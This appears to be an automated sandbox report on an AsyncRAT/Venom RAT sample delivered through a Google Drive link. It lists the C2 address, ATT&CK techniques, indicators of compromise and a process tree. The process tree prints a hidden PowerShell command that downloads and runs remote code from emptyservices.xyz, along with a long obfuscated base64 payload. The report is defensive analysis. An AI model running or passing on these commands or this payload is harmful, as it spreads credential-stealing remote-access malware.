asyncrat | hxxp://drive[.]google[.]com/open?id=1IEytWERQpW-P1OcplzPCk0KmjuAW6Ldf

Analysis

max time kernel
240s
max time network
247s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2024 20:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://drive.google.com/open?id=1IEytWERQpW-P1OcplzPCk0KmjuAW6Ldf

Score

10^/10

asyncrat hp elite discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

HP Elite

45.88.88.7:4675

Mutex

gbchkhrksazddij

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/244-271-0x0000015EEDE50000-0x0000015EEDE68000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
96	4560	powershell.exe
117	244	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
772	powershell.exe
244	powershell.exe
4560	powershell.exe
5320	powershell.exe
5936	powershell.exe
5824	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
14	drive.google.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5164	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	powershell.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 81620.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
1096	msedge.exe
1096	msedge.exe
3972	msedge.exe
3972	msedge.exe
2116	identity_helper.exe
2116	identity_helper.exe
4176	msedge.exe
4176	msedge.exe
4560	powershell.exe
4560	powershell.exe
4560	powershell.exe
5320	powershell.exe
5320	powershell.exe
5320	powershell.exe
5936	powershell.exe
5936	powershell.exe
5936	powershell.exe
5824	powershell.exe
5824	powershell.exe
5824	powershell.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
244	powershell.exe
244	powershell.exe
244	powershell.exe
244	powershell.exe
244	powershell.exe
244	powershell.exe
244	powershell.exe
1328	msedge.exe
1328	msedge.exe
1328	msedge.exe
1328	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	5320	powershell.exe
Token: SeDebugPrivilege	5936	powershell.exe
Token: SeDebugPrivilege	5164	taskkill.exe
Token: SeDebugPrivilege	5824	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeIncreaseQuotaPrivilege	772	powershell.exe
Token: SeSecurityPrivilege	772	powershell.exe
Token: SeTakeOwnershipPrivilege	772	powershell.exe
Token: SeLoadDriverPrivilege	772	powershell.exe
Token: SeSystemProfilePrivilege	772	powershell.exe
Token: SeSystemtimePrivilege	772	powershell.exe
Token: SeProfSingleProcessPrivilege	772	powershell.exe
Token: SeIncBasePriorityPrivilege	772	powershell.exe
Token: SeCreatePagefilePrivilege	772	powershell.exe
Token: SeBackupPrivilege	772	powershell.exe
Token: SeRestorePrivilege	772	powershell.exe
Token: SeShutdownPrivilege	772	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeSystemEnvironmentPrivilege	772	powershell.exe
Token: SeRemoteShutdownPrivilege	772	powershell.exe
Token: SeUndockPrivilege	772	powershell.exe
Token: SeManageVolumePrivilege	772	powershell.exe
Token: 33	772	powershell.exe
Token: 34	772	powershell.exe
Token: 35	772	powershell.exe
Token: 36	772	powershell.exe
Token: SeIncreaseQuotaPrivilege	772	powershell.exe
Token: SeSecurityPrivilege	772	powershell.exe
Token: SeTakeOwnershipPrivilege	772	powershell.exe
Token: SeLoadDriverPrivilege	772	powershell.exe
Token: SeSystemProfilePrivilege	772	powershell.exe
Token: SeSystemtimePrivilege	772	powershell.exe
Token: SeProfSingleProcessPrivilege	772	powershell.exe
Token: SeIncBasePriorityPrivilege	772	powershell.exe
Token: SeCreatePagefilePrivilege	772	powershell.exe
Token: SeBackupPrivilege	772	powershell.exe
Token: SeRestorePrivilege	772	powershell.exe
Token: SeShutdownPrivilege	772	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeSystemEnvironmentPrivilege	772	powershell.exe
Token: SeRemoteShutdownPrivilege	772	powershell.exe
Token: SeUndockPrivilege	772	powershell.exe
Token: SeManageVolumePrivilege	772	powershell.exe
Token: 33	772	powershell.exe
Token: 34	772	powershell.exe
Token: 35	772	powershell.exe
Token: 36	772	powershell.exe
Token: SeIncreaseQuotaPrivilege	772	powershell.exe
Token: SeSecurityPrivilege	772	powershell.exe
Token: SeTakeOwnershipPrivilege	772	powershell.exe
Token: SeLoadDriverPrivilege	772	powershell.exe
Token: SeSystemProfilePrivilege	772	powershell.exe
Token: SeSystemtimePrivilege	772	powershell.exe
Token: SeProfSingleProcessPrivilege	772	powershell.exe
Token: SeIncBasePriorityPrivilege	772	powershell.exe
Token: SeCreatePagefilePrivilege	772	powershell.exe
Token: SeBackupPrivilege	772	powershell.exe
Token: SeRestorePrivilege	772	powershell.exe
Token: SeShutdownPrivilege	772	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeSystemEnvironmentPrivilege	772	powershell.exe
Token: SeRemoteShutdownPrivilege	772	powershell.exe
Token: SeUndockPrivilege	772	powershell.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe
3972	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
244	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3972 wrote to memory of 1540	3972	msedge.exe	84
PID 3972 wrote to memory of 1540	3972	msedge.exe	84
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 3496	3972	msedge.exe	85
PID 3972 wrote to memory of 1096	3972	msedge.exe	86
PID 3972 wrote to memory of 1096	3972	msedge.exe	86
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87
PID 3972 wrote to memory of 4680	3972	msedge.exe	87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://drive.google.com/open?id=1IEytWERQpW-P1OcplzPCk0KmjuAW6Ldf
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9189546f8,0x7ff918954708,0x7ff918954718
  2⤵
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
  2⤵
  PID:3496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  2⤵
  PID:4680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:3780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:2796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
  2⤵
  PID:4652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:1568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5604 /prefetch:8
  2⤵
  PID:2236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
  2⤵
  PID:5076
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6644 /prefetch:8
  2⤵
  PID:1060
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6644 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6580 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4176
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Turbo Generator_Pictures & Drawing.vbs"
  2⤵
  - Checks computer location settings
  PID:1936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4560
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand DQAKACAAIAAgACAAJABSAE8AcQBGAHcAZwBvAEEAIAA9ACAAMgA1ADEAMAANAAoAIAAgACAAIAAkAFMAagBYAFEAVQB4AGIAWAAgAD0AIAAoAFsATQBhAHQAaABdADoAOgBTAHEAcgB0ACgAJABZAEgAWQBVAHIAZgBPAHoAKQAgACoAIAA0ADQAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkADQAKACAAIAAgACAAJABKAFMAVQBTAG0ATQBVAFkAIAA9ACAAIgAyACIADQAKACAAIAAgACAAJABVAGIAZQBFAGMAWQBPAGYAIAA9ACAAIgBTACIADQAKACAAIAAgACAAJABVAGQATwB3AEsAZgBJAHgAIAA9ACAAIgA2ACIADQAKACAAIAAgACAAJAB6AEQAZQBiAG4AeQBBAEYAIAA9ACAAIgBWACIADQAKACAAIAAgACAAJABzAE8AcQBWAE4AWABWAGYAIAA9ACAAIgBHACIADQAKACAAIAAgACAAJAByAG8ATwBaAHEASQBhAHcAIAA9ACAAIgBLACIADQAKACAAIAAgACAAJABmAEEAZQB5AEUAagBoAEMAIAA9ACAAIgA3ACIADQAKACAAIAAgACAAJABQAFEAWQBzAFAAbABBAGcAIAA9ACAAIgByACIADQAKACAAIAAgACAAJABPAFAASQBhAEYAZABaAEcAIAA9ACAAIgBxACIADQAKACAAIAAgACAAJABtAHUAZwB3AEgAdwBpAE4AIAA9ACAAIgBsACIADQAKACAAIAAgACAAJABnAFIASABxAEcAeQBYAEUAIAA9ACAAIgBsACIADQAKACAAIAAgACAAJABmAEIAbgBsAE0AQgBaAEYAIAA9ACAAIgBGACIADQAKACAAIAAgACAAJABFAE4AZQBYAGYATwBOAE4AIAA9ACAAIgBLACIADQAKACAAIAAgACAAJABmAFMATgBGAHIAWgBCAEcAIAA9ACAAIgBKACIADQAKACAAIAAgACAAJABuAHgASgBGAEkAYgBSAEQAIAA9ACAAIgBiACIADQAKACAAIAAgACAAJABPAEYAVQBGAFoAYQBiAFoAIAA9ACAAIgBrACIADQAKACAAIAAgACAAJAB0ADEAIAA9ACAAOAAwACAAKwAgADgAOAANAAoAIAAgACAAIAAkAHQAMgAgAD0AIAAoACQAdAAxACAAKgAgADQAKQAgAC0AIAAoACQAdAAxACAALwAgADkAKQANAAoAIAAgACAAIAAkAHQAMwAgAD0AIAAiADIAIgAgACsAIAAiAFMAIgAgACsAIAAiADYAIgAgACsAIAAiAFYAIgAgACsAIAAiAEcAIgANAAoAIAAgACAAIAAkAHQANAAgAD0AIAAiAEsAIgAgACsAIAAiADcAIgAgACsAIAAiAHIAIgAgACsAIAAiAHEAIgAgACsAIAAiAGwAIgANAAoAIAAgACAAIAAkAHQANQAgAD0AIAAiAGwAIgAgACsAIAAiAEYAIgAgACsAIAAiAEsAIgAgACsAIAAiAEoAIgAgACsAIAAiAGIAIgAgACsAIAAiAGsAIgANAAoAIAAgACAAIAAkAHAAIAA9ACAAJAB0ADMAIAArACAAJAB0ADQAIAArACAAJAB0ADUADQAKACAAIAAgACAAJABhACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABwACkADQAKACAAIAAgACAAJABkACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgB0AEQAYgAvADEAWABhADAAVQBNAHUATgBlADMASwBzAFoAawB3AEEAYgBvAEUAaABtADQAUgBEAHkAWQB4AHQAKwBxAGoAZQBFAEUAdAA3AHoAdAA0ADAASQBPAFQAdwBrAHgAdQBmAG8AcgBnAE0AbwB2AEUAUAB3ADUAZAA1AHYAaQBaAEIAdwBiAHMAZAAvAFkAZgBQAE8AMgBZAHkARABjAEMAaQBkAFQAQQB0AGwAYgBXAHMAUQB4AGUAVgB2AE8AQwBxAE4ARABPAHgAVAB4AGcAcgBDACsAOQBGAEIAYgBKAEcAKwBkAHIASwBHAEwAUgBkAFgAaQBXAGgASgByAHAAVwBjAHcAWgBBAEoAYwA3AEQAMQBPAFgAUgBNADMAcwBJAEgAUABwAEUARQBPAFEAZwB2AEoAQQBqAFkAdQBRAE0AWgBCAFcARwBOADcAeABZAEwAVwBXAHcAUQBoAHEAcgA3AEgAYwB0AEUARgBuAEUAdwA1ADgAbgBlAFIAbABlAFMAMgBLAFEALwAxADkANQBvAEsAQgBuAEwAawBiAEMAdABsAHAAegAxADIATQBSADUAYgA2AFIATQBZAFoAcgBvACsAZgA5AEIARQArAFcAcQA3AHoARwBIAFAAeQA5AC8AQwBSAE4AbAA5AFUAUwBRAGQAMgA2AGYAcgBNAFoANgArAFQAawBSAGkAYQA1AEgAbQBnAHQAbgA5AG0AUgBTAHcATQBYAEoAaQAxAC8AbgB2AGIAWgAwAFgAagBzAFcAcgBDACsAMQBIAGgAYgBPAHYAOABEADAANQBsADYAeQA4ADUAWABlACsATwA5AGMAOAA2AGYAWAB2AFcAMgAzADcAQwBpADgANwBWAEcAUABpACsARwBqADEATwA5AGQAcAA5AEgAMQA2ADAARgBQAEcAOAAwAE8ANwAzAGwAVwBRAEsAaABYADYAQwB2AFEAVgBiAHAAagBpAEEATQBJAGMAWQBXADcAWQBpAGIAcgBwADEAVgBCAGgAUwBLADIAQgBrAEQAdgB5AEcAKwBaAFQANgBWAGIAawBoAFIAMgB3AGQAOABaAGoAeABCAFoASgBDAE0AVgBLADUASQAwAGQAYgB1AHYANwBVAGoAUgBVAE8AVQAzAEEANgBqADgANgA0AFcATAA1ACsAUwBJAEIAegBvACsAaABHAHcAQgArAFYAMABiAHYAUABwAGoASgBMAFYAVAAzAE8AdgBGAFcAVgBEADIAZgBXADAAbAA0AFAAQQBGAFkATgBXAG4AeQBJAGQAbwBoAFcAawBVADgAVgBXAEkAOQAyACsAWABjAFMATAB4AFkAdAAxAFUAbQBpADIATABuADQAYwA2AEcAZwBKAGYARQBBAFEANwBXADcAeABiAEEAWABSAHEAMwBlAEYAcQBkAGsATgBOADQAZQBvAEcAVABYADgATwBSAEgAZABCAFkASQA3AFcAZQAyAGcAZwBFAFoAcgBJAEUAWgBWAHkAMAA5AGsANgBrADQAOQB4AHQAaQBDAGUAZQBIAHgAVwA2AGoAQQBtADQASQB2AHkAYQBmADIATgBNAEMAbgBtAFMARABoACsAaQBwAGQANgBVADYAQQA4AFIAOABTAHAATQB3ADQAeQA3AGUAbABFAEgAKwA2AGcAQQBlAGYANwBaAG4AMwBEAEkAcQBtAHkAUwBxAG8AUAB4AE4AaABzAGQAMwBWAHMAeABEAFoAbwBoAEkAKwBlAE0ANQA1AGsAWABlADQAZABxAGYAVAA2AEsATAArAEkASgBoAGQAdgAyAGoAWgBaAHcAegBUAFMARwBmAGMAbQBiAHMAdwAwAEcAZwAyAGIAeABHAGcARwBjAHUAeQB2AHAAdABTAE8AcQB0AFEASAAxAHoAUwBzAGkARAA3AFcAVABlAFUAZgBYAFAAMQBZAGMAVABNADMANQBzAGIAegBXAFoAeQB0AHgATABvAHcAaABzAFIARQBkAGYANQBZAFgAOQBXAFcAYQBtAFYAOQAxAGEAOQBtAGEAUQBKAGYAcwAvAE8AOQA4AHIAUwB5ADIAaABpAG4AdwBHAFAANwB6AEYAMwBkAHAAVABSAFMAMwArAFIAbgBDACsAdQBqAEUAZAB4ADAANwA2AEEAbgA5AHQAUQBKAEQAUgByAE8AaQBGAHkANQBrAFAAbQA0ADgAVABUACsAcgBZADcAagBpAGYAVwBXAHEAcgBmAE4ANQBWADAAKwBJAHoAdQBuAHEASwA1AHIANABZAEYATAA0AHAAUABKAGkAWQBZADEANwA2AFgAWQBHAGcATAAxAEMAdwBKAEcATABwAHcAeABjAFoARwBzAC8AQwBUAHgAUwAvAHkAcQAwADIAbgBtAFoARABjAG8AaQBnAGUAMgA0AHgASgBnAEcAUwBYAGEAdABKAGUAdQArAGYATgBwAEQAQgBFADQAZQAzAGoAdgB1AHEAVQAzAEcAaAA0AFYAMwBiAE0ASwA0AEoAOQBRAFcAeAA2ADAAZABsAFAAMgBYAE0AegBjADgAZQBLAFEAUQBiAC8AQgBqAFUAZQBUAE0ALwB3AHEATwBqAG8ASwBjAG4AWQB5AHgANQBSAHoAYwA4AFIASgBLAEIAdABvACsATQBUAGMAQwBHAEEAegA4AHgATAA5AEIANwAzADAAagBUAE4AVAB1AEkANQBMADQAOQBIAHEAcABaAFcAVwBiAFcAQgB0ADMAbQBPACsAVwA2AG0AUgBvAFAAcgBkAHgAdABlAG4AeQBRAGwASgAyAEkATQAxAHIASQBDAGoAYwBzAC8AaQBWAHAAMgBaAG4ANQBCAFEAQwBlAEIAWQBTAEUAWABCAEYARQBMACsARwBlAFIAbABCAFoAcAAyAEoANgBoADAAZQBEAGEASwBqADIAOQB3AFEAVQBsAEsAVQB4AEsAUAAzAGMAbgBFAEYAQgBaAGkATwAxAHIARAAwAGgALwBwAFQAMwA1AEgAdwBSAGoANwB3AEwAUAA4AHoASQA4AGw